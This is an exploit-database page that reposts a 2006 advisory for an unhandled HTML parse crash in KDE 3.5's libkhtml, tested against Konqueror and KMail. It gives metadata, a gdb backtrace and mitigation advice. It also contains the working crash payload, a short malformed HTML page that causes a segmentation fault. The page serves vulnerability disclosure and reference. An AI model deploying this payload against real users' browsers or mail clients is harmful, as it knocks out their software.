header-logo
Suggest Exploit
vendor:
KDE 3.5
by:
Federico L. Bossi Bonin
7,5
CVSS
HIGH
Unhandled HTML Parse Exception
20
CWE
Product Name: KDE 3.5
Affected Version From: KDE 3.5 and earlier versions
Affected Version To: KDE 3.5 and earlier versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Konqueror 3.5.2 and kmail 1.9.1
2006

KDE 3.5 | libkhtml <= 4.2.0 / Unhandled HTML Parse Exception

KDE 3.5 and earlier versions are vulnerable to an unhandled HTML parse exception. This vulnerability is caused due to an error in the 'DOM::Node::nodeType()' function in 'libkhtml.so.4' library when handling HTML tags with a range attribute. This can be exploited to cause a denial of service via a specially crafted HTML page.

Mitigation:

Upgrade to the latest version of KDE 3.5 or later.
Source

Exploit-DB raw data:

<!--
KDE 3.5 | libkhtml <= 4.2.0 / Unhandled HTML Parse Exception
============================================================

Tested with Konqueror 3.5.2 and kmail 1.9.1

Federico L. Bossi Bonin
fbossi@globalst.com.ar
www.globalst.com.ar

Program received signal SIGSEGV, Segmentation fault.
0xb64d81ff in DOM::Node::nodeType () from /usr/kde/3.5/lib/libkhtml.so.4

#0  0xb64d81ff in DOM::Node::nodeType () from /usr/kde/3.5/lib/libkhtml.so.4
#1  0xb64419e4 in QPtrDict<void>::count () from /usr/kde/3.5/lib/libkhtml.so.4
#2  0xb64b0550 in TestFunctionImp::~TestFunctionImp () from /usr/kde/3.5/lib/libkhtml.so.4
#3  0xb64b43a2 in TestFunctionImp::~TestFunctionImp () from /usr/kde/3.5/lib/libkhtml.so.4
#4  0xb63329d5 in DOM::RegisteredListenerList::getHTMLEventListener () from /usr/kde/3.5/lib/libkhtml.so.4
#5  0xbf86ae90 in ?? ()
#6  0x00000001 in ?? ()
#7  0xb736f8ec in ?? () from /usr/qt/3/lib/libqt-mt.so.3
#8  0xb71e36f9 in qt_check_pointer () from /usr/qt/3/lib/libqt-mt.so.3
Previous frame inner to this frame (corrupt stack?)

CRASH CODE:
===========
-->

<HTML>
<HEAD>
<RANGE <COL SPAN <>>
<FRAMESET onload >
</HEAD>
</HTML>

# milw0rm.com [2006-12-19]

Navigation

Suggest Exploit

Services By CQR